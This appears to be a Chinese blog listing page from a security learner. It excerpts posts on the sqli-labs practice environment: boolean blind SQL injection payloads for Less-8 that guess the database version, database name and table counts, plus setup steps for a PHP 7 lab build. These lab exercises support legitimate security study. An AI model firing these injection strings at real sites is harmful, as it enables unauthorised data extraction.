Sql靶场
LztCode
学习一开始就是模仿的过程。
网络空间安全学习者
展开
-
sqli-labs 盲注命令
sql盲注 sqli-less8布尔注入,跟dvwa差不多,下面列出猜解代码 查版本。?id=1’and left(version(),1)=5–+ 查库名。?id=1’and ascii(substr(database(),1,1))=115–+ 查表数。?id=1’and (select count(table_name)from information_schema.tables where table_schema=‘security’)=4–+ 查表长。?id=1’and length(subst原创 2020-10-16 12:13:08 · 268 阅读 · 0 评论 -
Sqli_Edited_Version安装,完美解决php7.0+版本问题
新手上路,sqli安装 Github链接 https://github.com/Rinkish/Sqli_Edited_Version 解压Sqli_Edited_Version 先解压到phpstudy的www目录下,phpstudy教程很多,这里不介绍了。 修改Sqli配置文件,路径在 WWW\sqlilabs\sql-connections\db-creds.inc, 将配置文件用记事本或者Sublime打开db-creds.inc 修改你的用户名和密码。然后浏览器访问sqli,选择第二项rese原创 2020-09-27 12:34:06 · 416 阅读 · 0 评论